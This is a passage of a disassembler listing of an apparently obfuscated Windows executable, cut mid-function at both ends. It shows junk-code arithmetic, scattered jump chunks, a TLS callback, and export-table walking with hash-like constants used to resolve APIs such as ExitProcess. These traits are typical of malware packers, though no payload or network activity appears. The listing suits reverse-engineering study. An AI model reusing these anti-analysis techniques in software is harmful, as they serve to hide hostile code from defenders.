loc_4320F3: ; CODE XREF: sub_43119E:loc_430E5B�j
push 915A235Dh
pop edx
xor edx, 4B67AD68h
rol edx, 15h
add edx, 3944B853h
push offset loc_430DC0
jmp j_nullsub_93
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_432112 proc near ; CODE XREF: sub_42EAFC+22�p
; FUNCTION CHUNK AT 0042E9F9 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
loc_43211C: ; CODE XREF: sub_42EC54:loc_43185B�j
and eax, 0FFh
mov eax, ds:dword_42F33C[eax*4]
mov [ebp-8], eax
jmp loc_42E9F9
sub_432112 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_432130: ; CODE XREF: sub_43119E:loc_42E893�j
push 0ABFD852Fh
pop eax
sub eax, 0AEAE4841h
and eax, 7C07EBDCh
jmp loc_42F73C
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313A8
loc_432147: ; CODE XREF: sub_4313A8:loc_43150D�j
jl loc_43056A
; END OF FUNCTION CHUNK FOR sub_4313A8
; START OF FUNCTION CHUNK FOR sub_430C91
loc_43214D: ; CODE XREF: sub_430C91+260�j
jmp loc_4304B6
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_432152: ; CODE XREF: sub_43237F-2804�j
jmp loc_42E27D
; END OF FUNCTION CHUNK FOR sub_43237F
; ---------------------------------------------------------------------------
cmp ecx, 0CF86E1C5h
jmp loc_43095B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430790
loc_432162: ; CODE XREF: sub_430790:loc_430E4F�j
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-8], 80h
jz loc_42FF0F
inc dword ptr [ebp-8]
loc_432175: ; CODE XREF: sub_430790-870�j
; sub_430790+51E�j
mov eax, [ebp-8]
pop ecx
pop ecx
jmp loc_42FF0D
; END OF FUNCTION CHUNK FOR sub_430790
; =============== S U B R O U T I N E =======================================
sub_43217F proc near ; CODE XREF: j8.b78ws:00430645�j
; sub_42E8A6+34DD�p
; FUNCTION CHUNK AT 00431031 SIZE 00000007 BYTES
mov [esp+0], ecx
pop ecx
jnz loc_42EEA8
call sub_432300
mov edx, 0B9726E5Ah
call sub_432702
push eax
rol eax, 15h
jmp loc_431031
sub_43217F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4321A1 proc near ; DATA XREF: sub_42FB98+11EE�o
pop ebp
retn
sub_4321A1 endp ; sp-analysis failed
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4321A8 proc near ; CODE XREF: sub_430E95�j
; sub_42EA96+2860�p
push eax
call sub_43169E
push eax
call sub_431F8C
sub_4321A8 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_430223
loc_4321B4: ; CODE XREF: sub_430223+C�j
mov edx, [ebp+8]
mov [edx-10h], eax
inc dword ptr [ebp-4]
mov eax, [ebp+8]
jmp loc_42E70E
; END OF FUNCTION CHUNK FOR sub_430223
; =============== S U B R O U T I N E =======================================
sub_4321C5 proc near ; CODE XREF: j8.b78ws:0042EC3A�j
; sub_43119E-10E2�p
; FUNCTION CHUNK AT 0042E04C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F867 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430D21 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00431492 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043207B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004324A8 SIZE 00000022 BYTES
xchg ecx, [esp+0]
pop ecx
push eax
call sub_430361
loc_4321CF: ; DATA XREF: j8.b78ws:00430D17�o
mov eax, [eax+64h]
call sub_430DCF
loc_4321D7: ; CODE XREF: sub_42EA28+1186�j
jmp loc_4324A8
sub_4321C5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_4321DC: ; CODE XREF: sub_430C91:loc_42E528�j
jnz loc_430F22
jmp loc_43113E
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431A67
loc_4321E7: ; CODE XREF: sub_431A67-3966�j
popf
loc_4321E8: ; CODE XREF: sub_431A67:loc_43146E�j
call sub_432300
push offset sub_43133D
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_431A67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E12B
loc_4321F7: ; CODE XREF: sub_42E12B+1DA1�j
add ecx, 9A1252EDh
push offset loc_4302F4
jmp j_nullsub_58
; END OF FUNCTION CHUNK FOR sub_42E12B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C0
loc_432207: ; CODE XREF: sub_42F8C0+15�j
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42F8C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_432209 proc near ; CODE XREF: sub_430A4D+E�j
jmp loc_431298
sub_432209 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2A1
loc_43220E: ; CODE XREF: sub_42E2A1+7�j
jmp loc_42F95D
; END OF FUNCTION CHUNK FOR sub_42E2A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431A67
loc_432213: ; CODE XREF: sub_431A67:loc_42EA59�j
ror eax, 11h
push eax
call sub_4302E0
retn
; END OF FUNCTION CHUNK FOR sub_431A67
; ---------------------------------------------------------------------------
loc_43221D: ; DATA XREF: sub_43082D:loc_43083E�o
mov eax, ds:dword_42E058
mov eax, [eax]
mov ds:dword_42E06C, eax
xor eax, eax
push offset sub_42E435
jmp loc_430B5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4309F3
loc_432235: ; CODE XREF: sub_4309F3:loc_42ED35�j
push offset sub_4313A8
jmp nullsub_59
; END OF FUNCTION CHUNK FOR sub_4309F3
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43223F proc near ; CODE XREF: sub_4300E7�j
retn
sub_43223F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_432240: ; CODE XREF: sub_43119E+1422�j
jmp loc_432519
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC6B
loc_432245: ; CODE XREF: sub_42EC6B+D�j
jmp loc_42E2E8
; END OF FUNCTION CHUNK FOR sub_42EC6B
; ---------------------------------------------------------------------------
jl loc_42FCC3
; =============== S U B R O U T I N E =======================================
sub_432250 proc near ; CODE XREF: sub_4315E4-120C�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg edx, [esp-4+arg_0]
jmp sub_4302E0
sub_432250 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_43225C: ; CODE XREF: sub_4315A4:loc_4304EB�j
call sub_42FFCD
jmp loc_431B81
; ---------------------------------------------------------------------------
loc_432266: ; CODE XREF: sub_4315A4:loc_42FCFD�j
add edx, 14h
mov ecx, [ebx+edx-8]
or ecx, ecx
push offset sub_431F17
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
push 0CC2F33DAh
pop edx
xor edx, 0DB9CF215h
call sub_432702
push edi
mov edi, eax
xchg edi, [esp]
rol eax, 12h
jmp loc_42FA4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_432298: ; CODE XREF: sub_4314D8:loc_42FA54�j
jnz loc_430038
jmp loc_431F82
; END OF FUNCTION CHUNK FOR sub_4314D8
; =============== S U B R O U T I N E =======================================
sub_4322A3 proc near ; CODE XREF: j8.b78ws:0042E5F5�j
; sub_42E14A+214B�p
; FUNCTION CHUNK AT 00430A62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431532 SIZE 00000003 BYTES
mov [esp+0], edx
pop edx
jz loc_42FBDA
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jz loc_42FBD3
jmp loc_430A62
sub_4322A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4322BE proc near ; CODE XREF: sub_43119E-2B0F�p
; j8.b78ws:00432875�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042E55C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042E601 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00430C82 SIZE 0000000F BYTES
mov [esp+0], edi
pop edi
add eax, ebp
push ecx
push 61945ED1h
pop ecx
jmp loc_42E55C
sub_4322BE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_4322D0: ; CODE XREF: sub_431F6D:loc_42F86C�j
jz loc_42E25B
jmp loc_432310
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4322DB: ; CODE XREF: sub_43119E:loc_4311D3�j
pop ebx
add ebx, 98B4FEDAh
add eax, ebx
pop ebx
mov esi, [eax]
push edx
jmp loc_430E5B
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43082D
loc_4322EE: ; CODE XREF: sub_43082D:loc_42ED12�j
cmp al, 0A4h
jnz loc_430336
jmp locret_4317D8
; END OF FUNCTION CHUNK FOR sub_43082D
; ---------------------------------------------------------------------------
jmp loc_431BD9
; =============== S U B R O U T I N E =======================================
sub_432300 proc near ; CODE XREF: sub_42ECB4-B22�j
; sub_430273-20CF�p ...
push offset sub_4306C9
jmp nullsub_61
sub_432300 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43230A proc near ; CODE XREF: sub_430F9D�j
retn
sub_43230A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43230B proc near ; CODE XREF: sub_432806-2E�j
jmp sub_430C12
sub_43230B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_432310: ; CODE XREF: sub_431F6D+369�j
jmp loc_42FCDA
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E12B
loc_432315: ; CODE XREF: sub_42E12B+3A0D�j
jmp loc_42E95A
; END OF FUNCTION CHUNK FOR sub_42E12B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_43231A: ; CODE XREF: sub_430C91+4B3�j
push eax
or edx, ebx
test edi, 253FA962h
jmp loc_430F1C
; END OF FUNCTION CHUNK FOR sub_430C91
; =============== S U B R O U T I N E =======================================
sub_432328 proc near ; CODE XREF: j8.b78ws:00430DBB�j
; sub_43169E+3�p
mov [esp+0], edi
pop edi
push ebp
push offset sub_42FAE7
jmp j_nullsub_63
sub_432328 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_432337: ; CODE XREF: sub_42E14A:loc_42E16F�j
jnz loc_430658
jmp loc_4310C7
; END OF FUNCTION CHUNK FOR sub_42E14A
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_432342 proc near ; CODE XREF: sub_431502�j
retn
sub_432342 endp
; ---------------------------------------------------------------------------
loc_432343: ; DATA XREF: sub_430C2C:loc_431D6E�o
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_4301C9
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_432359: ; DATA XREF: sub_430C12:loc_42E27D�o
or [edx-8], eax
jmp loc_430FA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_432361: ; CODE XREF: sub_43237F-FE5�j
; sub_43237F+E�j
cmp dword ptr [ebp-10h], 1
call sub_4327E5
loc_43236A: ; CODE XREF: sub_42FD11+14�j
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_43237F
; =============== S U B R O U T I N E =======================================
sub_43236F proc near ; CODE XREF: j8.b78ws:0042F7BE�j
; sub_42FE87+3�p
xchg ebx, [esp+0]
pop ebx
pop ebx
retn
sub_43236F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F88
loc_432375: ; CODE XREF: j8.b78ws:0042F985�j
; sub_430F88+970�j
jmp loc_4314E7
; END OF FUNCTION CHUNK FOR sub_430F88
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43237A proc near ; CODE XREF: sub_42FDAF-155D�j
jmp sub_4308C3
sub_43237A endp
; =============== S U B R O U T I N E =======================================
sub_43237F proc near ; CODE XREF: j8.b78ws:0042E775�j
; sub_4320D1:loc_43000A�p
; FUNCTION CHUNK AT 0042FB67 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00430701 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431396 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00431E71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432152 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432361 SIZE 0000000E BYTES
mov [esp+0], ebx
pop ebx
jno loc_431396
cmp dword ptr [ebp-10h], 0
jnz loc_432361
mov eax, [ebp+8]
jmp loc_431E71
sub_43237F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_43239B: ; CODE XREF: sub_42E3FA+4EF�j
mov [ebp-0Ch], eax
jmp loc_42FEFD
; ---------------------------------------------------------------------------
loc_4323A3: ; CODE XREF: sub_42E3FA:loc_42E8D1�j
cmp dword ptr [ebp-1Ch], 66h
jnz loc_42FA18
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
jmp loc_431683
; END OF FUNCTION CHUNK FOR sub_42E3FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_4323BD: ; CODE XREF: sub_4308AB:loc_431BD3�j
mov [ebp-4], edx
cmp dword ptr [ebp-8], 0
jbe loc_431860
jmp loc_43005F
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_4323CF: ; CODE XREF: sub_43094F:loc_43264F�j
mov eax, ds:dword_42EF3C[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz loc_42E8D1
jmp loc_42E610
; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E825
loc_4323E8: ; CODE XREF: sub_42E825+2E67�j
inc [ebp+var_20]
mov eax, [ebp+var_1C]
jmp loc_42E091
; END OF FUNCTION CHUNK FOR sub_42E825
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_4323F3: ; CODE XREF: sub_4314D8:loc_430706�j
xchg edx, [esp+4+var_4]
mov esp, ebp
xchg ebx, [esp+0]
adc ebp, eax
jmp loc_431595
; END OF FUNCTION CHUNK FOR sub_4314D8
; =============== S U B R O U T I N E =======================================
sub_432402 proc near ; DATA XREF: j8.b78ws:0042FF32�o
xor eax, 5DC0317Ah
add eax, ebp
call sub_43162A
loc_43240F: ; CODE XREF: j8.b78ws:00430ED8�j
pop ebp
retn
sub_432402 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_432411: ; CODE XREF: sub_430BA0-888�j
jmp loc_42FF51
; END OF FUNCTION CHUNK FOR sub_430BA0
; =============== S U B R O U T I N E =======================================
sub_432416 proc near ; CODE XREF: j8.b78ws:00430ECE�p
mov dword ptr [eax], 0
retn
sub_432416 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_43241E: ; CODE XREF: sub_42E873:loc_430076�j
jz loc_431E9D
jmp loc_42F748
; END OF FUNCTION CHUNK FOR sub_42E873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_432429: ; CODE XREF: sub_42ED88-A8F�j
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jle loc_42ED99
mov eax, [ebp-4]
xor edx, edx
push edx
jmp loc_430CC1
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA8A
loc_432441: ; CODE XREF: sub_42EA8A+35D2�j
or esi, 5AAF5FFh
test edx, 15D83F2Eh
jmp loc_42EC65
; END OF FUNCTION CHUNK FOR sub_42EA8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC54
loc_432452: ; CODE XREF: sub_42EC54+C�j
mov [ebp+var_8], edx
mov [ebp+var_4], eax
call sub_42FDAF
loc_43245D: ; CODE XREF: sub_42E3FA:loc_42F9DE�j
shl eax, 8
mov edx, [ebp+var_20]
movzx edx, byte ptr [edx]
or eax, edx
mov [ebp+var_1C], eax
inc [ebp+var_20]
mov eax, [ebp+var_1C]
jmp loc_43185B
; END OF FUNCTION CHUNK FOR sub_42EC54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_432476: ; CODE XREF: sub_42E3FA:loc_42E40E�j
call sub_430C91
; END OF FUNCTION CHUNK FOR sub_42E3FA
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_43247B: ; CODE XREF: sub_42ED88+B5F�j
; sub_42ED88+B6D�j ...
jo loc_432521
mov eax, [ebp-4]
call sub_42FA32
test al, al
jmp loc_431A22
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_432490: ; CODE XREF: sub_4315A4-A7C�j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
call sub_430464
loc_43249E: ; CODE XREF: sub_42FAE7+1C0D�j
jmp loc_42E371
; END OF FUNCTION CHUNK FOR sub_4315A4
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_4324A8: ; CODE XREF: sub_4321C5:loc_4321D7�j
push 622E5996h
pop edx
and edx, 212F98C2h
add edx, 0F68D8F79h
add edx, ebp
add edx, 0E9445801h
mov [edx], eax
pop edx
jmp loc_42F867
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
retn
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
public TlsCallback_0
TlsCallback_0 proc near ; DATA XREF: j8.b78ws:TlsCallbacks�o
; FUNCTION CHUNK AT 0042FDCA SIZE 00000005 BYTES
xchg ebp, ebx
push ebx
call sub_42E12B
loc_4324D8: ; CODE XREF: sub_42E9C6+F�j
jmp loc_42FDCA
TlsCallback_0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E426
loc_4324DD: ; CODE XREF: sub_42E426+A�j
jmp loc_42E548
; END OF FUNCTION CHUNK FOR sub_42E426
; ---------------------------------------------------------------------------
loc_4324E2: ; CODE XREF: j8.b78ws:0042E5E1�j
; DATA XREF: j8.b78ws:00430269�o
mov eax, [eax+24h]
push offset sub_42ECE1
jmp locret_42F85C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_4324EF: ; CODE XREF: sub_430EAC:loc_430A48�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_430EAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301DE
loc_4324F1: ; CODE XREF: sub_4301DE+F�j
jmp loc_430A92
; END OF FUNCTION CHUNK FOR sub_4301DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6B3
loc_4324F6: ; CODE XREF: sub_42E6B3+13�j
jmp loc_42F7D5
; END OF FUNCTION CHUNK FOR sub_42E6B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43082D
loc_4324FB: ; CODE XREF: sub_43082D-23D1�j
jmp loc_431662
; END OF FUNCTION CHUNK FOR sub_43082D
; ---------------------------------------------------------------------------
dword_432500 dd 0FC2F7C80h dword_432504 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_42E1FD+1663�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EECE
loc_432508: ; CODE XREF: sub_42EECE+13�j
jmp loc_4327F7
; END OF FUNCTION CHUNK FOR sub_42EECE
; ---------------------------------------------------------------------------
db 0D6h, 36h, 40h
dword_432510 dd 0 ; sub_42ED88+9F9�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F41
loc_432514: ; CODE XREF: sub_431F41-710�j
jmp loc_431107
; END OF FUNCTION CHUNK FOR sub_431F41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_432519: ; CODE XREF: sub_43119E:loc_432240�j
mov eax, [ebp-4]
jmp loc_430E90
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_432521: ; CODE XREF: sub_42ED88:loc_43247B�j
mov eax, [ebp-4]
call sub_42FA32
test al, al
jnz loc_42ED99
mov eax, [ebp-4]
jmp loc_431F28
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
loc_432539: ; DATA XREF: sub_42EACE+6�o
jz loc_431271
call sub_42EAEB
jnz loc_431271
mov eax, ebx
jmp loc_43206C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_432551: ; CODE XREF: sub_4315A4:loc_430B22�j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jmp loc_430436
; END OF FUNCTION CHUNK FOR sub_4315A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E487
loc_432560: ; CODE XREF: sub_42E487:loc_430F03�j
mov eax, [ebp+8]
call sub_4320D1
loc_432568: ; CODE XREF: j8.b78ws:0042F7D0�j
jmp loc_431568
; END OF FUNCTION CHUNK FOR sub_42E487
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9DA
loc_43256D: ; CODE XREF: sub_42E9DA+19�j
jmp loc_431425
; END OF FUNCTION CHUNK FOR sub_42E9DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316AB
loc_432572: ; CODE XREF: sub_4316AB:loc_431E5F�j
pop ecx
shl eax, 3
mov edx, [ebp+arg_4]
or [edx-8], eax
; END OF FUNCTION CHUNK FOR sub_4316AB
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_43257C: ; CODE XREF: sub_4320D1:loc_42FFF8�j
; sub_4320D1-20CC�j ...
jno loc_4310A3
jmp loc_43104D
; END OF FUNCTION CHUNK FOR sub_4301B9
; =============== S U B R O U T I N E =======================================
sub_432587 proc near ; DATA XREF: j8.b78ws:0042EB0F�o
push edi
push offset sub_42E64C
jmp j_nullsub_94
sub_432587 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_432592: ; CODE XREF: sub_43119E-8F8�j
jnp loc_43039E
adc eax, 0E14B40ADh
loc_43259E: ; CODE XREF: sub_43119E:loc_431266�j
call sub_432300
mov edx, 0DD5E106Fh
push edx
call sub_42E796
loc_4325AE: ; DATA XREF: sub_43094F:loc_431A22�o
jnz loc_42ED99
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_431149
jmp loc_432240
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4325C5 proc near ; DATA XREF: sub_430754:loc_4318A9�o
mov ds:dword_4312A8, eax
retn
sub_4325C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4325CC proc near ; CODE XREF: sub_42EB5A�j
; FUNCTION CHUNK AT 0042E070 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004307C5 SIZE 0000000B BYTES
push ebp
mov ebp, esp
jmp loc_42E070
sub_4325CC endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431444
loc_4325D5: ; CODE XREF: sub_431444+14�j
jmp loc_430C5D
; END OF FUNCTION CHUNK FOR sub_431444
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4325DA: ; CODE XREF: sub_43119E:loc_42EF2A�j
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
dec eax
jmp loc_430E03
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4325E9 proc near ; DATA XREF: sub_43119E-320�o
; FUNCTION CHUNK AT 0042E2E1 SIZE 00000005 BYTES
inc dword ptr [ebp-0Ch]
jmp loc_42E2E1
sub_4325E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4325F1: ; CODE XREF: sub_43119E:loc_430541�j
; sub_43119E-C42�j
inc dword ptr [ebp-8]
inc dword ptr [ebp-0Ch]
jmp loc_430301
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_4325FC proc near ; CODE XREF: sub_42E8EF�p
; sub_42E6B3:loc_42F7D5�p ...
; FUNCTION CHUNK AT 004304F5 SIZE 00000007 BYTES
jnb sub_43157B
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
jmp loc_4304F5
sub_4325FC endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43260E: ; CODE XREF: j8.b78ws:00430618�j
jmp loc_42E4F1
; ---------------------------------------------------------------------------
push 8D863982h
jno locret_431A56
jmp sub_431CDE
; ---------------------------------------------------------------------------
loc_432623: ; DATA XREF: sub_430BA0-25E0�o
push 0ECC77775h
pop esi
add esi, 137BB043h
xchg esi, [esp]
jmp loc_430090
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_432637: ; CODE XREF: sub_43119E-3165�j
mov edx, 0B3BE6E6Fh
loc_43263C: ; CODE XREF: sub_43119E:loc_42FA9C�j
push ecx
push offset sub_42FC13
jmp j_nullsub_72
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_432647: ; CODE XREF: sub_43094F-9A9�j
; sub_42E873:loc_431E93�j
shl eax, 3
call sub_42E426
loc_43264F: ; CODE XREF: sub_42E825+2E73�j
jmp loc_4323CF
; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_432654: ; CODE XREF: sub_4301B9+B�j
mov eax, [ebp-20h]
call sub_430178
pop ecx
mov [ebp-20h], eax
jmp loc_430375
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_432665: ; CODE XREF: sub_42E3FA:loc_431CF5�j
test byte ptr [ebp-8], 2
jz loc_430DF4
jmp sub_43267C
; END OF FUNCTION CHUNK FOR sub_42E3FA
; ---------------------------------------------------------------------------
ror edi, 8
jmp sub_42F832
; =============== S U B R O U T I N E =======================================
sub_43267C proc near ; CODE XREF: sub_42E3FA+4275�j
; FUNCTION CHUNK AT 00430071 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430DF1 SIZE 00000003 BYTES
push ebp
mov eax, [ebp-20h]
call sub_430178
pop ecx
jmp loc_430071
sub_43267C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or eax, ebp
jmp sub_430A1F
; ---------------------------------------------------------------------------
loc_432692: ; CODE XREF: j8.b78ws:0042E913�j
mov ds:dword_432504, eax
call sub_4325FC
mov edx, 90F68180h
call sub_42EC54
mov ds:dword_432510, eax
jmp loc_430579
; =============== S U B R O U T I N E =======================================
sub_4326B0 proc near ; CODE XREF: sub_42EEA3�j
add esp, 0FFFFFFF8h
mov [ebp-4], eax
push offset sub_42FB80
jmp j_nullsub_73
sub_4326B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4326C0 proc near ; CODE XREF: sub_42E0EE�j
retn
sub_4326C0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_4326C1: ; CODE XREF: sub_43094F-9BD�j
jmp loc_42E548
